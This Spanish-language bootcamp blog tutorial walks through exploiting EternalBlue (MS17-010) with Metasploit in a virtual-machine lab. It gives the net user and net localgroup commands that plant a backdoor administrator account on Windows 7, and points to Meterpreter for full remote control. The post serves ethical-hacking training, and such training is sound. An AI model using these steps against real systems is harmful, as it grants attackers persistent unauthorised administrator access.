¿Cómo crear un backdoor en Windows 7?

| Última modificación: 23 de septiembre de 2024 | Tiempo de Lectura: 3 minutos

Algunos de nuestros reconocimientos:

Premios KeepCoding

El siguiente tutorial para crear un backdoor en Windows 7 está hecho con fines académicos. El uso malicioso de esta técnica podría ser sancionada en la mayoría de países. Sin embargo, su uso en auditorías de seguridad permite medir el riesgo de una vulnerabilidad informática.

El tamaño del payload que se utiliza en un ciberataque varía según el tipo de vulnerabilidad explotada. Por ello, a veces no es posible inyectar una gran cantidad de código en un ordenador que ha sido hackeado. Entonces, si tuvieses que inyectar una sola línea de código en un ordenador, ¿cuál ejecutarías?

En este post, veremos un método muy conocido para crear un backdoor en Windows 7, aprovechando una vulnerabilidad de Microsoft Server Message Block con un exploit llamado EternalBlue.

¿Cómo crear un backdoor en Windows 7?

Una forma muy común de crear un backdoor en Windows 7 es crear un usuario en el sistema. Esto es posible desde cualquier consola de este sistema operativo que se ejecute con permisos de administrador. Recuerda que, en un ejercicio de pentesting, al infiltrarte en un sistema contarás con los permisos con los que se haya ejecutado el software vulnerable explotado.

El comando para crear un administrador desde una terminal de Windows 7 es:

net user roberto abcd1234... /add

Con este comando de ejemplo, habremos creado un usuario llamado “roberto“, con una contraseña “abcd1234…“. Para convertir a este usuario en administrador, ejecutaríamos el comando:

net localgroup "administradores" roberto /add

🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴

Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada

👉 Prueba gratis el Bootcamp en Ciberseguridad por una semana

Ahora, haremos lo mismo de manera remota con Metasploit.

¿Cómo crear un backdoor en Windows 7 con Metasploit?

  1. Crea dos máquinas virtuales con tu software de virtualización de preferencia. En una de ellas, instala un sistema operativo Windows 7 sin el parche de seguridad MS17-010 y, en otra, instala un sistema operativo Kali Linux.
  2. En Kali Linux, inicia el framework de Metasploit, que ya viene instalado por defecto. Para hacerlo, ejecuta el comando “msfconsole” en un terminal del sistema.
  3. Allí, ejecuta el comando “search eternalblue” para buscar el exploit.
  4. Copia la ruta del exploit “exploit/windows/smb/ms17_010_eternalblue” y ejecuta el siguiente comando para utilizarlo: “use exploit/windows/smb/ms17_010_eternalblue“.
  5. Ahora, ejecuta el comando “show options”, que desplegará una tabla que te indicará las variables que debes rellenar para usar el exploit.
  6. Para establecer las variables, utiliza los comandos “set LPORT 6666” y “set RHOSTS ip de la máquina Win7“. Para conocer la IP de la máquina Windows 7, ejecuta el comando “ipconfig” desde un terminal de su sistema.
  7. Para configurar el payload y crear el backdoor, utiliza el comando “set payload windows/x64/exec“.
  8. Utiliza el comando “show options” para ver las variables a establecer para el payload.
  9. Para crear el backdoor utiliza el comando: “set CMD net user backdoor abcd1234… /add“. Así, habrás creado un usuario llamado “backdoor”, con la contraseña “abcd1234…”. Puedes modificar los valores a tu gusto.
  10. Finalmente, para darle permisos de administrador, ejecuta el comando “set CMD net localgroup “administradores” backdoor /add“.
  11. Por último, ejecuta el comando “exploit”.

Para verificar que el procedimiento de crear un backdoor en Windows 7 haya funcionado, puedes dirigirte a la máquina virtual vulnerable y comprobar que el usuario se haya creado. Actualmente, es difícil encontrar sistemas operativos con esta vulnerabilidad, pero este ejercicio de pentesting te ayudará a practicar tus técnicas de postexplotación y ampliar tu arsenal de herramientas como hacker ético.

¿Cómo ejecutar payloads más complejos?

Ejecutar un solo comando en un terminal de Windows 7 es un payload de un tamaño muy pequeño. De hecho, es un payload en su mínima expresión. Existen payloads más complejos, como Meterpreter, que permiten tener un acceso remoto completo a la máquina. Para encontrarlos, utiliza el comando “search” de Metasploit y selecciona los módulos que contengan la palabra “Meterpreter”. Así, tendrás acceso al payload más avanzado de todos y podrás darle al ordenador comprometido instrucciones más elaboradas.

Finalmente, como ya has aprendido a crear un backdoor en Windows 7. Si quieres aprender más técnicas de hacking ético avanzadas, en KeepCoding tenemos el curso ideal para ti. Ingresa a nuestro Ciberseguridad Full Stack Bootcamp y conviértete en un experto en tan solo 7 meses. Aprende sobre temas como pentesting, criptografía, análisis de malware y mucho más. ¡No sigas esperando y dale un impulso a tu vida profesional!

Carlos Cilleruelo

CEO and co-founder of Byron Labs & Coordinador del Bootcamp en Ciberseguridad.

Posts más leídos

¡CONVOCATORIA ABIERTA!

Ciberseguridad

Full Stack Bootcamp

Clases en Directo | Profesores en Activo | Temario 100% actualizado